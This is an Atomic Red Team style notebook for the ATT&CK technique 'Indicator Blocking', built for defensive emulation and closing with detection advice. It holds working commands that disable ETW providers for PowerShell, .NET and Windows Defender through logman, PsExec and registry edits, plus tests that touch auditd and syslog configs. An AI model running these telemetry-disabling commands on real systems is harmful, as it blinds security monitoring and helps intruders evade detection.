# T1562.006 - Impair Defenses: Indicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).

## Atomic Tests

### Atomic Test #1 - Auditing Configuration Changes on Linux Host
Emulates modification of auditd configuration files

**Supported Platforms:** linux
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf
if [ -f "/etc/auditd.conf" ];
then sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf
else sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf
fi 
sed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 1

### Atomic Test #2 - Logging Configuration Changes on Linux Host
Emulates modification of syslog configuration.

**Supported Platforms:** linux
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `bash`
```bash
if [ -f "/etc/syslog.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf
fi
if [ -f "/etc/rsyslog.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf
fi
if [ -f "/etc/syslog-ng/syslog-ng.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf
fi
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 2

### Atomic Test #3 - Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PSExec must be installed on the machine.
##### Check Prereq Commands:
```powershell
if (Test-Path "$env:temp\pstools\PsExec.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip"
expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cmd /c "$env:temp\pstools\PsExec.exe" -accepteula -i -s cmd.exe /c logman update trace "EventLog-Application" --p "Microsoft-Windows-Powershell" -ets```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 3

### Atomic Test #4 - Disable .NET Event Tracing for Windows Via Registry (cmd)
Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 4

### Atomic Test #5 - Disable .NET Event Tracing for Windows Via Registry (powershell)
Disables ETW for the .NET Framework using PowerShell to update the Windows registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 5

### Atomic Test #6 - LockBit Black - Disable the ETW Provider of Windows Defender -cmd
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" /v Operational /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 6

### Atomic Test #7 - LockBit Black - Disable the ETW Provider of Windows Defender -Powershell
An adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.

**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender" -Name Operational  -PropertyType DWord -Value 0 -Force
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 7

## Detection
Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.

Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: <code>HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}</code>